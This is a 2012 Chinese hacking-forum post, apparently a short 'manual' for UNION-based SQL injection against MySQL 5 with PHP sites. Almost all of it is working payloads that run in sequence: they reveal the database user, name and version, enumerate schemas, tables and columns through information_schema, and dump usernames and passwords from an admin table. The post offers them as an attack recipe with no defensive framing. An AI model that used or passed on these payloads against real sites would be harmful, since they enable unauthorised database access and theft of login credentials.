找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2124|回复: 0
打印 上一主题 下一主题

mysql盲注手册

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:27:53 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
0 V( G/ _( T: [& H2 V: a  w
教程内容:Mysql 5+php 注入3 T* ], N2 Q* {8 N0 y

# |/ o$ G/ d& p5 C: K- K: M6 V& a$ Q% i, E! R0 G

% U0 T; |: a! y4 W3 W一.查看MYSQL基本信息(库名,版本,用户)
# u, ^' ]' f/ P7 m7 W- T5 Y7 J* ?2 ]) i' e
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
* v5 g. U0 p3 ~
6 C% R* @2 u9 c! v8 S二.查数据库
9 _7 c2 }, `. l; B" R2 E) h0 A" r$ O/ n* Q& L( u
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*0 w% v. L/ D6 Y4 c( ?
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。9 i* o( ?# T' f$ K4 _
$ y3 x9 U* M( [; y
三.暴表
! v8 R! I  `# t: J8 L3 S* y  e, i6 R# w. w# W5 X# p
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
) ]5 p1 e  N( x+ W* h
+ w5 z3 F1 P' Dlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
$ n. ~$ a" Y& B9 K
  n" Q. Q/ g1 V6 I; s. P四.暴字段
1 o) r$ T$ t" |$ r1 E3 ]4 P9 S
0 \9 n8 \; o; r4 Hand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*5 c" ]4 S* O$ `9 I; Q5 ?, F9 B5 u) N

. G9 N/ k3 G5 J7 K$ qlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
& J. n- U. S0 Q+ O9 |! C9 l
1 J, m7 ~7 ]+ f* Z. p) J) b五.暴数据
3 i  C7 m1 c5 B( ]4 u/ I7 ?! v* G
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*  n+ B: |& p$ t1 ]/ Q5 O  V# C: k0 F

2 @% e8 V9 I; _) r- C5 M, ?& h$ P3 U8 `! y# z# f
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
* K3 W  T8 _0 g6 t% U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表